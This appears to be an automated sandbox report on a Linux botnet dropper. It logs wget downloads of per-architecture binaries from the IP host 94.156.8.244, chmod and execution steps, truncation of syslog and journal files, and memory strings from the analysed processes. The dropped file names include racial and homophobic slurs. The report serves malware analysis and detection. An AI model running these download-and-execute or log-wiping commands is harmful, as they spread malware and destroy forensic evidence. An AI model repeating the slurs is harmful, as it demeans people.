Source: /bin/sh (PID: 6443)	Chmod executable: /usr/bin/chmod -> chmod +x kekw			Jump to behavior
Source: /bin/sh (PID: 6458)	Chmod executable: /usr/bin/chmod -> chmod +x what			Jump to behavior
Source: /bin/sh (PID: 6481)	Chmod executable: /usr/bin/chmod -> chmod +x kys			Jump to behavior
Source: /bin/sh (PID: 6499)	Chmod executable: /usr/bin/chmod -> chmod +x shiteater			Jump to behavior
Source: /bin/sh (PID: 6504)	Chmod executable: /usr/bin/chmod -> chmod +x blyat			Jump to behavior

Source: /bin/sh (PID: 6506)

Rm executable: /usr/bin/rm -> rm wtf.sh

Jump to behavior

Source: /bin/sh (PID: 6218)	Wget executable: /usr/bin/wget -> wget http://94.156.8.244/wtf.sh			Jump to behavior
Source: /bin/sh (PID: 6220)	Wget executable: /usr/bin/wget -> wget -O lol http://94.156.8.244/mips			Jump to behavior
Source: /bin/sh (PID: 6233)	Wget executable: /usr/bin/wget -> wget -O lmao http://94.156.8.244/mpsl			Jump to behavior
Source: /bin/sh (PID: 6258)	Wget executable: /usr/bin/wget -> wget -O faggot http://94.156.8.244/x86_64			Jump to behavior
Source: /bin/sh (PID: 6403)	Wget executable: /usr/bin/wget -> wget -O gay http://94.156.8.244/arm			Jump to behavior
Source: /bin/sh (PID: 6409)	Wget executable: /usr/bin/wget -> wget -O retard http://94.156.8.244/arm5			Jump to behavior
Source: /bin/sh (PID: 6425)	Wget executable: /usr/bin/wget -> wget -O nigger http://94.156.8.244/arm6			Jump to behavior
Source: /bin/sh (PID: 6430)	Wget executable: /usr/bin/wget -> wget -O shit http://94.156.8.244/arm7			Jump to behavior
Source: /bin/sh (PID: 6435)	Wget executable: /usr/bin/wget -> wget -O nigga http://94.156.8.244/i586			Jump to behavior
Source: /bin/sh (PID: 6440)	Wget executable: /usr/bin/wget -> wget -O kekw http://94.156.8.244/i686			Jump to behavior
Source: /bin/sh (PID: 6447)	Wget executable: /usr/bin/wget -> wget -O what http://94.156.8.244/powerpc			Jump to behavior
Source: /bin/sh (PID: 6478)	Wget executable: /usr/bin/wget -> wget -O kys http://94.156.8.244/sh4			Jump to behavior
Source: /bin/sh (PID: 6485)	Wget executable: /usr/bin/wget -> wget -O shiteater http://94.156.8.244/m68k			Jump to behavior
Source: /bin/sh (PID: 6501)	Wget executable: /usr/bin/wget -> wget -O blyat http://94.156.8.244/sparc			Jump to behavior

Source: /usr/bin/chmod (PID: 6221)	File: /tmp/lol (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6404)	File: /tmp/gay (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /usr/bin/chmod (PID: 6410)	File: /tmp/retard (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Source: /usr/bin/wget (PID: 6220)	File written: /tmp/lol			Jump to dropped file
Source: /usr/bin/wget (PID: 6233)	File written: /tmp/lmao (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6258)	File written: /tmp/faggot (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6403)	File written: /tmp/gay			Jump to dropped file
Source: /usr/bin/wget (PID: 6409)	File written: /tmp/retard			Jump to dropped file
Source: /usr/bin/wget (PID: 6425)	File written: /tmp/nigger (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6430)	File written: /tmp/shit (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6435)	File written: /tmp/nigga (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6447)	File written: /tmp/what (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6485)	File written: /tmp/shiteater (deleted)			Jump to dropped file
Source: /usr/bin/wget (PID: 6501)	File written: /tmp/blyat (deleted)			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Source: /tmp/retard (PID: 6419)

Log files deleted: /var/log/kern.log

Jump to behavior

Source: /usr/bin/wget (PID: 6218)

File: /usr/bin/wtf.sh

Jump to dropped file

Source: /tmp/lol (PID: 6222)	File: /tmp/lol			Jump to behavior
Source: /tmp/retard (PID: 6411)	File: /tmp/retard			Jump to behavior

Source: lol.16.dr	Dropped file: segment LOAD with 7.9242 entropy (max. 8.0)
Source: lmao (deleted).26.dr	Dropped file: segment LOAD with 7.9285 entropy (max. 8.0)
Source: faggot (deleted).32.dr	Dropped file: segment LOAD with 7.8949 entropy (max. 8.0)
Source: gay.47.dr	Dropped file: segment LOAD with 7.9704 entropy (max. 8.0)
Source: retard.55.dr	Dropped file: segment LOAD with 7.9567 entropy (max. 8.0)
Source: nigger (deleted).65.dr	Dropped file: segment LOAD with 7.9656 entropy (max. 8.0)
Source: shit (deleted).71.dr	Dropped file: segment LOAD with 7.9574 entropy (max. 8.0)
Source: nigga (deleted).77.dr	Dropped file: segment LOAD with 7.8889 entropy (max. 8.0)
Source: what (deleted).89.dr	Dropped file: segment LOAD with 7.9522 entropy (max. 8.0)

Malware Analysis System Evasion

Source: /tmp/retard (PID: 6419)	Truncated file: /var/log/syslog			Jump to behavior
Source: /tmp/retard (PID: 6419)	Truncated file: /var/log/kern.log			Jump to behavior
Source: /tmp/retard (PID: 6419)	Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal			Jump to behavior
Source: /tmp/retard (PID: 6419)	Truncated file: /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/user-1000.journal			Jump to behavior

Source: /tmp/lol (PID: 6222)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/gay (PID: 6405)	Queries kernel information via 'uname':			Jump to behavior
Source: /tmp/retard (PID: 6411)	Queries kernel information via 'uname':			Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6268)	Queries kernel information via 'uname':			Jump to behavior

Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: /arm/tmp/vmware-root_721-4290559889
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsdviceurnald
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmp	Binary or memory string: $/tmp/vmware-root_721-4290559889,
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp	Binary or memory string: !/var/lib/PackageKit!/var/lib/ucf/cache!/var/lib/vmware/VGAuthr1/var/lib/vmware/VGAuth/aliasStore!/var/lib/geoclue!/var/lib/vmware/arm/var1/var/cache/private/fwupdmgr/fwupd!/var/lib/lightdm-data!/var/lib/grub/esprm/varQ/var/lib/systemd/deb-systemd-helper-enabled/cloud-final.service.wantsar1/var/lib/update-notifier0!/var/lib/fwupd!/var/lib/boltd/arm/var1/var/cache/dictionaries-common0!/var/lib/fwupd/gnupg!/var/lib/grub/ucfrm/varQ
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmp	Binary or memory string: Wx86_64/usr/bin/qemu-mips./lol0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/usr/binCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./lol
Source: sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6519.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6521.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6549.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6552.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp	Binary or memory string: $x86_64/usr/bin/qemu-arm./retard0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./retard
Source: lol, 6262.1.00007f41f8468000.00007f41f846e000.rw-.sdmp	Binary or memory string: vmware-root_721-4290559889c(59889c(
Source: lol, 6226.1.00005580be181000.00005580be1a8000.rw-.sdmp	Binary or memory string: U1/tmp/vmware-root_721-42905598891/var/log/installer/block0
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips./lol0day8.244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your displayT`
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: retard, 6586.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: rU1/var/lib/snapd/ssl/store-certspell!/var/lib/snapd/sequence1/tmp/vmware-root_721-4290559889!/dev/misc/watchdogQ/var/lib/app-info/icons/ubuntu-focal-updates-universe/64x641/var/lib/emacsen-common/state/package
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp	Binary or memory string: /var/lib/vmware
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp	Binary or memory string: @/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmp	Binary or memory string: vmware-root_721-4290559889
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp	Binary or memory string: U1!/etc/qemu-binfmt/mips
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: retard, 6448.1.00007f1484041000.00007f1484047000.rw-.sdmp	Binary or memory string: vmware-root_721-4290559889ck59889ck
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp	Binary or memory string: hXUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp	Binary or memory string: /var/lib/vmware4/var/lib/PackageKit
Source: lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp	Binary or memory string: U!/sbin/mount.vmhgfs
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: /sbin/mount.vmhgfs
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmp	Binary or memory string: vmware
Source: lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmp	Binary or memory string: /proc/6411/exe/usr/bin/qemu-armystemd-hostnamednitorye4-notifyd-agent-1
Source: retard, 6448.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: !/sbin/xfs_db!/sbin/gdiskrU/arm/sbi1/sbin/lvmpolld/arm/sbin/gdisk0!/sbin/getcap!/sbin/pptpsetup/arm/sbi1/sbin/select-default-ispell0!/sbin/pccardctl1/sbin/slattach/arm/bi10!/sbin/mount.vmhgfs!/sbin/isosize!/sbin/grpck
Source: sh, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6222.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6224.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6226.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6228.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6231.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6234.1.00005580be0fa000.00005580be181000.rw-.sdmp, lol, 6262.1.00005580be0fa000.00005580be181000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mips
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp	Binary or memory string: T/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f/tmpX/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj\/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj/tmp$/tmp/vmware-root_721-4290559889P/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i4/tmp/snap.lxd
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm./retard0day244/wtf.sh; /bin/sh wtf.sh_spaw/0inux-gnu/xfce4/panel/plugins/libactions.so1412582925actionsAction ButtonsLog out, lock or other system actionson plugin for the Xfce panels and control the brightness of your display
Source: sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: rUTime!/etc/qemu-binfmt/arm
Source: retard, 6586.1.00007f1484031000.00007f1484041000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_721-4290559889
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp	Binary or memory string: (/var/lib/vmware/VGAuth/aliasStore
Source: retard, 6586.1.00007f1484041000.00007f148424f000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerh/
Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: rUP!/tmp/ssh-hOQ5FjG2iVgOa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-At6pzha/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg1/var/lib/emacsen-common/stateOQ5FjG2iVg!/var/lib/python !/tmp/snap.lxdervice-APWQ/var/lib/polkit-1/localauthority/90-mandatory.dP!/tmp/snap.lxd/tmp1/var/lib/emacsen-common/state/flavor!/var/lib/emacsen-commona/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlhq/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-hostnamed.service-54jvlh/tmp.service-54jva/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8estemd-hostnaa/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e/tmp.service!/varqemu-binfmt/arm/tmp1/var/log/installer/block
Source: lol, 6226.1.00007f41f8468000.00007f41f8474000.rw-.sdmp	Binary or memory string: $/tmp/vmware-root_721-4290559889
Source: retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6549.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6552.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6558.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6561.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: qemu-binfmt/arm/tmp1
Source: sh, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6222.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6224.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6226.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6231.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6234.1.00007ffde835e000.00007ffde837f000.rw-.sdmp, lol, 6262.1.00007ffde835e000.00007ffde837f000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips
Source: sh, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, gay, 6405.1.0000555868b36000.0000555868c63000.rw-.sdmp, sh, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6411.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6450.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6452.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6454.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6479.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6482.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6486.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6492.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6494.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6496.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6502.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6511.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6513.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6519.1.000055720a30b000.000055720a558000.rw-.sdmp, retard, 6521.1.000055720a30b000.000055720a558000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: retard, 6586.1.000055720a558000.000055720a579000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp, lol, 6228.1.00007f41f8457000.00007f41f8468000.rw-.sdmp, sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, sh, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6411.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6450.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6452.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6454.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6479.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6482.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6486.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6492.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6494.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6496.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6502.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6511.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp, retard, 6513.1.00007ffc5443e000.00007ffc5445f000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: sh, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp, gay, 6405.1.00007ffc09ba2000.00007ffc09bc3000.rw-.sdmp	Binary or memory string: Enqx86_64/usr/bin/qemu-arm./gay0daySUDO_GID=1000MAIL=/var/mail/rootUSER=rootHOME=/rootOLDPWD=/tmpCOLORTERM=truecolorSUDO_UID=1000LOGNAME=rootTERM=xterm-256colorPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0LANG=en_US.UTF-8XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_COMMAND=/bin/bashSHELL=/bin/bashSUDO_USER=saturninoPWD=/tmp./gay
Source: lol, 6228.1.00007f41f8468000.00007f41f849e000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-mips./lol0dayT`
Source: retard, 6444.1.00007f1484041000.00007f1484047000.rw-.sdmp	Binary or memory string: vmware-root_721-429055988959889